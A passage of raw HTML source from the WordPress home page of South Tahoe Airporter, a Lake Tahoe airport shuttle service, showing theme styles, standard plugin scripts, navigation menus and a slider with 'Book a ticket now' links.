linear}.ball-spin-fade-loader>div:nth-child(1){top:25px;left:0;animation-delay:-.84s;-webkit-animation-delay:-.84s}.ball-spin-fade-loader>div:nth-child(2){top:17.05px;left:17.05px;animation-delay:-.72s;-webkit-animation-delay:-.72s}.ball-spin-fade-loader>div:nth-child(3){top:0;left:25px;animation-delay:-.6s;-webkit-animation-delay:-.6s}.ball-spin-fade-loader>div:nth-child(4){top:-17.05px;left:17.05px;animation-delay:-.48s;-webkit-animation-delay:-.48s}.ball-spin-fade-loader>div:nth-child(5){top:-25px;left:0;animation-delay:-.36s;-webkit-animation-delay:-.36s}.ball-spin-fade-loader>div:nth-child(6){top:-17.05px;left:-17.05px;animation-delay:-.24s;-webkit-animation-delay:-.24s}.ball-spin-fade-loader>div:nth-child(7){top:0;left:-25px;animation-delay:-.12s;-webkit-animation-delay:-.12s}.ball-spin-fade-loader>div:nth-child(8){top:17.05px;left:-17.05px;animation-delay:0s;-webkit-animation-delay:0s}@-webkit-keyframes ball-spin-fade-loader{50%{opacity:.3;-webkit-transform:scale(.4);transform:scale(.4)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes ball-spin-fade-loader{50%{opacity:.3;-webkit-transform:scale(.4);transform:scale(.4)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}</style> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="format-detection" content="telephone=no"> <link rel="alternate" type="application/rss+xml" title="southtahoeairporter &raquo; Feed" href="http://southtahoeairporter.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="southtahoeairporter &raquo; Comments Feed" href="http://southtahoeairporter.com/comments/feed/" /> <link rel="shortcut icon" href="http://southtahoeairporter.com/wp-content/themes/jupiter/assets/images/favicon.png" /> <script type="text/javascript"> window.abb = {}; php = {}; window.PHP = {}; PHP.ajax = "http://southtahoeairporter.com/wp-admin/admin-ajax.php";PHP.wp_p_id = "121";var mk_header_parallax, mk_banner_parallax, mk_page_parallax, mk_footer_parallax, mk_body_parallax; var mk_images_dir = "http://southtahoeairporter.com/wp-content/themes/jupiter/assets/images", mk_theme_js_path = "http://southtahoeairporter.com/wp-content/themes/jupiter/assets/js", mk_theme_dir = "http://southtahoeairporter.com/wp-content/themes/jupiter", mk_captcha_placeholder = "Enter Captcha", mk_captcha_invalid_txt = "Invalid. Try again.", mk_captcha_correct_txt = "Captcha correct.", mk_responsive_nav_width = 1040, mk_vertical_header_back = "Back", mk_vertical_header_anim = "1", mk_check_rtl = true, mk_grid_width = 1140, mk_ajax_search_option = "toolbar", mk_preloader_bg_color = "#ffffff", mk_accent_color = "#315e37", mk_go_to_top = "true", mk_smooth_scroll = "true", mk_preloader_bar_color = "#315e37", mk_preloader_logo = ""; var mk_header_parallax = false, mk_banner_parallax = false, mk_page_parallax = false, mk_footer_parallax = false, mk_body_parallax = false, mk_no_more_posts = "No More Posts"; </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/southtahoeairporter.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.17"}}; !function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)return!1;switch(g.textBaseline="top",g.font="600 32px Arial",a){case"flag":return g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3;case"diversity":return g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,d=c[0]+","+c[1]+","+c[2]+","+c[3],g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e;case"simple":return g.fillText(h(55357,56835),0,0),0!==g.getImageData(16,16,1,1).data[0];case"unicode8":return g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='layerslider-css' href='http://southtahoeairporter.com/wp-content/plugins/LayerSlider/static/css/layerslider.css?ver=5.6.5' type='text/css' media='all' /> <link rel='stylesheet' id='ls-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://southtahoeairporter.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.4.2' type='text/css' media='all' /> <link rel='stylesheet' id='js-media-query-css' href='http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/min/media.css?ver=5.1.7' type='text/css' media='all' /> <link rel='stylesheet' id='theme-styles-css' href='http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/min/core-styles.css?ver=5.1.7' type='text/css' media='all' /> <link rel='stylesheet' id='theme-dynamic-styles-css' href='http://southtahoeairporter.com/wp-content/themes/jupiter/custom.css?ver=4.5.17' type='text/css' media='all' /> <style id='theme-dynamic-styles-inline-css' type='text/css'> body { background-color:#fff; } .mk-header { background-color:#ffffff;background-repeat:no-repeat;background-attachment:scroll; } .mk-header-bg { background-color:#ffffff; } .mk-classic-nav-bg { background-color:#ffffff; } #theme-page { background-color:#fff; } #mk-footer { background-color:#1a1a1a; } #mk-boxed-layout { -webkit-box-shadow:0 0 0px rgba(0, 0, 0, 0); -moz-box-shadow:0 0 0px rgba(0, 0, 0, 0); box-shadow:0 0 0px rgba(0, 0, 0, 0); } .mk-news-tab .mk-tabs-tabs .is-active a, .mk-fancy-title.pattern-style span, .mk-fancy-title.pattern-style.color-gradient span:after, .page-bg-color { background-color:#fff; } .page-title { font-size:44px; color:#ffffff; text-transform:none; font-weight:inherit; letter-spacing:2px; } .page-subtitle { font-size:14px; line-height:100%; color:#ffffff; font-size:14px; text-transform:none; } .header-style-1 .mk-header-padding-wrapper, .header-style-2 .mk-header-padding-wrapper, .header-style-3 .mk-header-padding-wrapper { padding-top:86px; } @font-face { font-family:'star'; src:url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/star/font.eot'); src:url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/star/font.eot?#iefix') format('embedded-opentype'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/star/font.woff') format('woff'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/star/font.ttf') format('truetype'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/star/font.svg#star') format('svg'); font-weight:normal; font-style:normal; } @font-face { font-family:'WooCommerce'; src:url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/woocommerce/font.eot'); src:url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/woocommerce/font.eot?#iefix') format('embedded-opentype'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/woocommerce/font.woff') format('woff'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/woocommerce/font.ttf') format('truetype'), url('http://southtahoeairporter.com/wp-content/themes/jupiter/assets/stylesheet/fonts/woocommerce/font.svg#WooCommerce') format('svg'); font-weight:normal; font-style:normal; } #padding-2 { height:40px; } #padding-3 { height:80px; } #text-block-4 { margin-bottom:0px; text-align:left; } #box-icon-5 p{color:#555555;}#box-icon-5 h4 a{color:#252525!important;} #padding-6 { height:40px; } #box-icon-7 p{color:#555555;}#box-icon-7 h4 a{color:#252525!important;} #padding-8 { height:80px; } #padding-10 { height:80px; } #fancy-title-11{letter-spacing:0px;text-transform:initial;font-size:18px;color:#ffffff;text-align:center;font-style:inherit;font-weight:bold;padding-top:0px;padding-bottom:18px;}#fancy-title-11 span{}#fancy-title-12{letter-spacing:0px;text-transform:initial;font-size:60px;color:#f20000;text-align:center;font-style:inherit;font-weight:300;padding-top:10px;padding-bottom:18px;}#fancy-title-12 span{} #padding-13 { height:80px; } #padding-14 { height:80px; } .full-width-9 { min-height:100px; margin-bottom:0px; background-color:#496b19; } .full-width-9 .page-section-content { padding:80px 0 50px; } #background-layer--9 { background-position:left top; background-repeat:repeat; ; ; } .full-width-9 .mk-fancy-title.pattern-style span, .full-width-9 .mk-blog-view-all { background-color:#496b19 !important; } #padding-16 { height:40px; } #padding-17 { height:40px; } #mk-title-box-18 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-18 span { line-height:34px; } #mk-title-box-18 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-19 { height:40px; } #box-icon-20 p{color:#555555;}#box-icon-20 h4 a{color:#252525!important;} .full-width-15 { min-height:100px; margin-bottom:0px; } .full-width-15 .page-section-content { padding:10px 0 10px; } #background-layer--15 { background-position:left top; background-repeat:repeat; ; ; } #padding-22 { height:40px; } #mk-title-box-23 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-23 span { line-height:34px; } #mk-title-box-23 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-24 { height:40px; } #box-icon-25 p{color:#555555;}#box-icon-25 h4 a{color:#252525!important;} .full-width-21 { min-height:100px; margin-bottom:0px; } .full-width-21 .page-section-content { padding:10px 0 10px; } #background-layer--21 { background-position:left top; background-repeat:repeat; ; ; } #padding-27 { height:40px; } #mk-title-box-28 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-28 span { line-height:34px; } #mk-title-box-28 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-29 { height:40px; } #box-icon-30 p{color:#555555;}#box-icon-30 h4 a{color:#252525!important;} .full-width-26 { min-height:100px; margin-bottom:0px; } .full-width-26 .page-section-content { padding:10px 0 10px; } #background-layer--26 { background-position:left top; background-repeat:repeat; ; ; } #padding-32 { height:40px; } #mk-title-box-33 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-33 span { line-height:34px; } #mk-title-box-33 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-34 { height:40px; } #box-icon-35 p{color:#555555;}#box-icon-35 h4 a{color:#252525!important;} .full-width-31 { min-height:100px; margin-bottom:0px; } .full-width-31 .page-section-content { padding:10px 0 10px; } #background-layer--31 { background-position:left top; background-repeat:repeat; ; ; } #padding-37 { height:40px; } #mk-title-box-38 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-38 span { line-height:34px; } #mk-title-box-38 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-39 { height:40px; } #box-icon-40 p{color:#555555;}#box-icon-40 h4 a{color:#252525!important;} .full-width-36 { min-height:100px; margin-bottom:0px; } .full-width-36 .page-section-content { padding:10px 0 10px; } #background-layer--36 { background-position:left top; background-repeat:repeat; ; ; } #padding-42 { height:40px; } #mk-title-box-43 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-43 span { line-height:34px; } #mk-title-box-43 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-44 { height:40px; } #box-icon-45 p{color:#555555;}#box-icon-45 h4 a{color:#252525!important;} .full-width-41 { min-height:100px; margin-bottom:0px; } .full-width-41 .page-section-content { padding:10px 0 10px; } #background-layer--41 { background-position:left top; background-repeat:repeat; ; ; } #padding-47 { height:40px; } #mk-title-box-48 { font-size:24px !important; text-align:left; color:#393836 !important; font-weight:bold; letter-spacing:0px; margin-top:0px; margin-bottom:18px; } #mk-title-box-48 span { line-height:34px; } #mk-title-box-48 span { background-color:rgba(0,0,0,0); box-shadow:8px 0 0 rgba(0,0,0,0), -8px 0 0 rgba(0,0,0,0); } #padding-49 { height:40px; } #box-icon-50 p{color:#555555;}#box-icon-50 h4 a{color:#252525!important;} .full-width-46 { min-height:100px; margin-bottom:0px; } .full-width-46 .page-section-content { padding:10px 0 10px; } #background-layer--46 { background-position:left top; background-repeat:repeat; ; ; } #padding-52 { height:70px; } #padding-53 { height:15px; } .full-width-51 { min-height:100px; margin-bottom:0px; background-color:#fafafa; border:1px solid #fafafa;border-left:none;border-right:none; } .full-width-51 .page-section-content { padding:20px 0 0px; } #background-layer--51 { background-position:left top; background-repeat:repeat; ; ; } .full-width-51 .mk-fancy-title.pattern-style span, .full-width-51 .mk-blog-view-all { background-color:#fafafa !important; } #padding-55 { height:12px; } #fancy-title-56{letter-spacing:0px;text-transform:initial;font-size:22px;color:#ffffff;text-align:right;font-style:inherit;font-weight:normal;padding-top:0px;padding-bottom:0px;}#fancy-title-56 span{} #mk-button-57 { margin-bottom:15px; margin-top:5px; margin-right:15px; } #mk-button-57 .mk-button { display:inline-block; max-width:100%; } .full-width-54 { min-height:100px; margin-bottom:0px; background-color:#315e37; border:1px solid #315e37;border-left:none;border-right:none; } .full-width-54 .page-section-content { padding:44px 0 0px; } #background-layer--54 { background-position:left top; background-repeat:repeat; ; ; } .full-width-54 .mk-fancy-title.pattern-style span, .full-width-54 .mk-blog-view-all { background-color:#315e37 !important; } #padding-59 { height:15px; } #fancy-title-60{letter-spacing:0px;text-transform:initial;font-size:36px;color:#252525;text-align:center;font-style:inherit;font-weight:300;padding-top:30px;padding-bottom:18px;}#fancy-title-60 span{} #padding-61 { height:70px; } #text-block-62 { margin-bottom:0px; text-align:left; } .full-width-58 { min-height:100px; margin-bottom:0px; background-color:#fafafa; border:1px solid #fafafa;border-left:none;border-right:none; } .full-width-58 .page-section-content { padding:20px 0 0px; } #background-layer--58 { background-position:left top; background-repeat:repeat; ; ; } .full-width-58 .mk-fancy-title.pattern-style span, .full-width-58 .mk-blog-view-all { background-color:#fafafa !important; } #padding-64 { height:15px; } #fancy-title-65{letter-spacing:0px;text-transform:initial;font-size:36px;color:#ffffff;text-align:center;font-style:inherit;font-weight:300;padding-top:30px;padding-bottom:18px;}#fancy-title-65 span{}#fancy-title-66{letter-spacing:0px;text-transform:initial;font-size:16px;color:#ffffff;text-align:center;font-style:inherit;font-weight:normal;padding-top:20px;padding-bottom:18px;}#fancy-title-66 span{} #padding-67 { height:20px; } .full-width-63 { min-height:100px; margin-bottom:0px; } .full-width-63 .page-section-content { padding:50px 0 20px; } #background-layer--63 { background-position:left top; background-repeat:repeat; position:absolute;; ; } </style> <link rel='stylesheet' id='js_composer_front-css' href='http://southtahoeairporter.com/wp-content/plugins/js_composer_theme/assets/css/js_composer.min.css?ver=4.12' type='text/css' media='all' /> <link rel='stylesheet' id='global-assets-css-css' href='http://southtahoeairporter.com/wp-content/uploads/mk_assets/components-production.min.css?ver=1552934767' type='text/css' media='all' /> <link rel='stylesheet' id='theme-options-css' href='http://southtahoeairporter.com/wp-content/uploads/mk_assets/theme-options-production.css?ver=1552934767' type='text/css' media='all' /> <link rel='stylesheet' id='ms-main-css' href='http://southtahoeairporter.com/wp-content/plugins/masterslider/public/assets/css/masterslider.main.css?ver=2.29.0' type='text/css' media='all' /> <link rel='stylesheet' id='ms-custom-css' href='http://southtahoeairporter.com/wp-content/uploads/masterslider/custom.css?ver=1.1' type='text/css' media='all' /> <link rel='stylesheet' id='mk-style-css' href='http://southtahoeairporter.com/wp-content/themes/jupiter/style.css?ver=4.5.17' type='text/css' media='all' /> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.8'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"5.6.5"}; /* ]]> */ </script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js?ver=5.6.5'></script> <script type='text/javascript' src='http://southtahoeairporter.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js?ver=5.6.5'></script> <link rel='https://api.w.org/' href='http://southtahoeairporter.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://southtahoeairporter.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://southtahoeairporter.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.5.17" /> <link rel="canonical" href="http://southtahoeairporter.com/" /> <link rel='shortlink' href='http://southtahoeairporter.com/' /> <link rel="alternate" type="application/json+oembed" href="http://southtahoeairporter.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fsouthtahoeairporter.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://southtahoeairporter.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fsouthtahoeairporter.com%2F&#038;format=xml" /> <script>var ms_grabbing_curosr='http://southtahoeairporter.com/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='http://southtahoeairporter.com/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';</script> <meta name="generator" content="MasterSlider 2.29.0 - Responsive Touch Image Slider" /> <script type='text/javascript'> SG_POPUPS_QUEUE = []; SG_POPUP_DATA = []; SG_APP_POPUP_URL = 'http://southtahoeairporter.com/wp-content/plugins/popup-builder'; SG_POPUP_VERSION='2.671_1;'; function sgAddEvent(element, eventName, fn) { if (element.addEventListener) element.addEventListener(eventName, fn, false); else if (element.attachEvent) element.attachEvent('on' + eventName, fn); } </script> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://southtahoeairporter.com/wp-content/plugins/js_composer_theme/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://southtahoeairporter.com/wp-content/plugins/js_composer_theme/assets/css/vc-ie8.min.css" media="screen"><![endif]--><meta name="generator" content="jupiter 5.1.7" /> <noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head> <body class="home page page-id-121 page-template-default loading _masterslider _msp_version_2.29.0 wpb-js-composer js-comp-ver-4.12 vc_responsive" itemscope="itemscope" itemtype="https://schema.org/WebPage" data-adminbar=""> <!-- Target for scroll anchors to achieve native browser bahaviour + possible enhancements like smooth scrolling --> <div id="top-of-page"></div> <div id="mk-boxed-layout"> <div id="mk-theme-container" > <header data-height='50' data-sticky-height='20' data-responsive-height='90' data-transparent-skin='' data-header-style='1' data-sticky-style='fixed' data-sticky-offset='header' id="mk-header-1" class="mk-header header-style-1 header-align-left toolbar-true menu-hover-5 sticky-style-fixed boxed-header mobile-align-right " role="banner" itemscope="itemscope" itemtype="https://schema.org/WPHeader" > <div class="mk-header-holder"> <div class="mk-header-toolbar"> <div class="mk-grid header-grid"> <div class="mk-toolbar-holder"> <span class="header-toolbar-contact"> <svg class="mk-svg-icon" data-name="mk-moon-phone-3" data-cacheid="icon-5cdd849f668a2" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M457.153 103.648c53.267 30.284 54.847 62.709 54.849 85.349v3.397c0 5.182-4.469 9.418-9.928 9.418h-120.146c-5.459 0-9.928-4.236-9.928-9.418v-11.453c0-28.605-27.355-33.175-42.449-35.605-15.096-2.426-52.617-4.777-73.48-4.777h-.14300000000000002c-20.862 0-58.387 2.35-73.48 4.777-15.093 2.427-42.449 6.998-42.449 35.605v11.453c0 5.182-4.469 9.418-9.926 9.418h-120.146c-5.457 0-9.926-4.236-9.926-9.418v-3.397c0-22.64 1.58-55.065 54.847-85.349 63.35-36.01 153.929-39.648 201.08-39.648l.077.078.066-.078c47.152 0 137.732 3.634 201.082 39.648zm-201.152 88.352c-28.374 0-87.443 2.126-117.456 38.519-30.022 36.383-105.09 217.481-38.147 217.481h311.201c66.945 0-8.125-181.098-38.137-217.481-30.018-36.393-89.1-38.519-117.461-38.519zm-.001 192c-35.346 0-64-28.653-64-64s28.654-64 64-64c35.347 0 64 28.653 64 64s-28.653 64-64 64z"/></svg> <a href="tel:Pleasebookticketsonlinebelow.Forquestionscall866-898-2463.">Please book tickets online below. For questions call 866-898-2463.</a> </span> <span class="mk-header-tagline">For best booking results, please use the Google Chrome browser.</span> <div class="mk-header-search"> <form class="mk-header-searchform" method="get" id="mk-header-searchform" action="http://southtahoeairporter.com"> <span> <input type="text" class="text-input on-close-state" value="" name="s" id="s" placeholder="Search.." /> <i class="mk-searchform-icon"><svg class="mk-svg-icon" data-name="mk-icon-search" data-cacheid="icon-5cdd849f67226" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1152 832q0-185-131.5-316.5t-316.5-131.5-316.5 131.5-131.5 316.5 131.5 316.5 316.5 131.5 316.5-131.5 131.5-316.5zm512 832q0 52-38 90t-90 38q-54 0-90-38l-343-342q-179 124-399 124-143 0-273.5-55.5t-225-150-150-225-55.5-273.5 55.5-273.5 150-225 225-150 273.5-55.5 273.5 55.5 225 150 150 225 55.5 273.5q0 220-124 399l343 343q37 37 37 90z"/></svg><input value="" type="submit" class="header-search-btn" /></i> </span> </form> </div> </div> </div> </div> <div class="mk-header-inner add-header-height"> <div class="mk-header-bg "></div> <div class="mk-toolbar-resposnive-icon"><svg class="mk-svg-icon" data-name="mk-icon-chevron-down" data-cacheid="icon-5cdd849f679e1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1792 1792"><path d="M1683 808l-742 741q-19 19-45 19t-45-19l-742-741q-19-19-19-45.5t19-45.5l166-165q19-19 45-19t45 19l531 531 531-531q19-19 45-19t45 19l166 165q19 19 19 45.5t-19 45.5z"/></svg></div> <div class="mk-grid header-grid"> <div class="mk-header-nav-container one-row-style menu-hover-style-5" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" > <nav class="mk-main-navigation js-main-nav"><ul id="menu-main-menu" class="main-navigation-ul"><li id="menu-item-116" class="menu-item menu-item-type-post_type menu-item-object-page no-mega-menu"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/our-fleet/">Our Fleet</a></li> <li id="menu-item-117" class="menu-item menu-item-type-post_type menu-item-object-page no-mega-menu"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/current-schedule/">Current Schedule</a></li> <li id="menu-item-151" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-121 current_page_item has-mega-menu"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/">Lake Tahoe Ticketing</a></li> </ul></nav> </div> <div class="mk-nav-responsive-link"> <div class="mk-css-icon-menu"> <div class="mk-css-icon-menu-line-1"></div> <div class="mk-css-icon-menu-line-2"></div> <div class="mk-css-icon-menu-line-3"></div> </div> </div> </div> <div class="mk-header-right"> </div> </div> <div class="mk-responsive-wrap"> <nav class="menu-main-menu-container"><ul id="menu-main-menu-1" class="mk-responsive-nav"><li id="menu-item-116" class="menu-item menu-item-type-post_type menu-item-object-page"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/our-fleet/">Our Fleet</a></li> <li id="menu-item-117" class="menu-item menu-item-type-post_type menu-item-object-page"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/current-schedule/">Current Schedule</a></li> <li id="menu-item-151" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-121 current_page_item"><a class="menu-item-link js-smooth-scroll" href="http://southtahoeairporter.com/">Lake Tahoe Ticketing</a></li> </ul></nav> <form class="responsive-searchform" method="get" action="http://southtahoeairporter.com"> <input type="text" class="text-input" value="" name="s" id="s" placeholder="Search.." /> <i><input value="" type="submit" /><svg class="mk-svg-icon" data-name="mk-icon-search" data-cacheid="icon-5cdd849f6aefa" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1664 1792"><path d="M1152 832q0-185-131.5-316.5t-316.5-131.5-316.5 131.5-131.5 316.5 131.5 316.5 316.5 131.5 316.5-131.5 131.5-316.5zm512 832q0 52-38 90t-90 38q-54 0-90-38l-343-342q-179 124-399 124-143 0-273.5-55.5t-225-150-150-225-55.5-273.5 55.5-273.5 150-225 225-150 273.5-55.5 273.5 55.5 225 150 150 225 55.5 273.5q0 220-124 399l343 343q37 37 37 90z"/></svg></i> </form> </div> </div> <div class="mk-header-padding-wrapper"></div> <section id="mk-page-introduce" class="intro-left"><div class="mk-grid"><h1 class="page-title mk-drop-shadow">Lake Tahoe Ticketing</h1><div class="clearboth"></div></div></section> </header> <div id="theme-page" class="master-holder clearfix" role="main" itemprop="mainContentOfPage" > <div class="mk-main-wrapper-holder"> <div id="mk-page-id-121" class="theme-page-wrapper mk-main-wrapper mk-grid full-layout "> <div class="theme-content " itemprop="mainContentOfPage"> </div></div></div> <div class="wpb_row vc_row mk-fullwidth-true attched-false vc_row-fluid js-master-row "> <div style="" class="vc_col-sm-12 wpb_column column_container _ height-full"> <script data-cfasync="false" type="text/javascript">var lsjQuery = jQuery;</script><script data-cfasync="false" type="text/javascript"> lsjQuery(document).ready(function() { if(typeof lsjQuery.fn.layerSlider == "undefined") { lsShowNotice('layerslider_1','jquery'); } else { lsjQuery("#layerslider_1").layerSlider({responsiveUnder: 1140, layersContainer: 1140, startInViewport: false, twoWaySlideshow: true, skin: 'jupiter', navStartStop: false, navButtons: false, showCircleTimer: false, lazyLoad: false, yourLogoStyle: 'left: 10px; top: 10px;', cbInit: function(element) { }, cbStart: function(data) { }, cbStop: function(data) { }, cbPause: function(data) { }, cbAnimStart: function(data) { }, cbAnimStop: function(data) { }, cbPrev: function(data) { }, cbNext: function(data) { }, skinsPath: 'https://southtahoeairporter.com/wp-content/plugins/LayerSlider/static/skins/'}) } }); </script><div id="layerslider_1" class="ls-wp-container" style="width:100%;height:500px;margin:0 auto;"><div class="ls-slide" data-ls="transition2d:3,4;"><img src="http://amadorstagelines.com/wp-content/uploads/2013/10/slidertahoe3.jpg" class="ls-bg" alt="Slide background" /><img class="ls-l-1" style="top:221px;left:1px;white-space: nowrap;" data-ls="fadein:false;durationout:1000;fadeout:false;" src="http://amadorstagelines.com/wp-content/uploads/2016/03/newlogo_v1.png" alt=""><div class="ls-l-1" style="top:388px;left:909px;white-space: nowrap;" data-ls="fadein:false;durationout:1000;fadeout:false;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b" target="_self" class="mk-button outline-btn-light mk-shortcode outline-dimension large ">BOOK A TICKET NOW! </a> </div></div><div class="ls-slide" data-ls="transition2d:3,4;"><img src="http://amadorstagelines.com/wp-content/uploads/2016/03/renoskyline.jpg" class="ls-bg" alt="Slide background" /><img class="ls-l-1" style="top:39px;left:135px;text align: center;white-space: nowrap;" data-ls="fadein:false;durationout:1000;fadeout:false;slidedirection:left;slideoutdirection:right;" src="http://amadorstagelines.com/wp-content/uploads/2016/03/newlogo_v2.png" alt=""><div class="ls-l-1" style="top:299px;left:519px;white-space: nowrap;" data-ls="fadein:false;durationout:1000;fadeout:false;"><a href="https://southtahoeairporter.betterez.com/cart/56e95e5e9553c0410b00070b" target="_self" class="mk-button outline-btn-light mk-shortcode outline-dimension large ">BOOK A TICKET NOW! </a> </div></div></div></div> </div> <div class="mk-main-wrapper-holder"> <div class="theme-page-wrapper full-layout mk-grid vc_row-fluid no-padding"> <div class="theme-content no-padding"> </div></div></div> <div class="wpb_row vc_row mk-fullwidth-true attched-false purchase vc_row-fluid js-master-row "> <div style="" class="vc_col-sm-12 wpb_column column_container _ 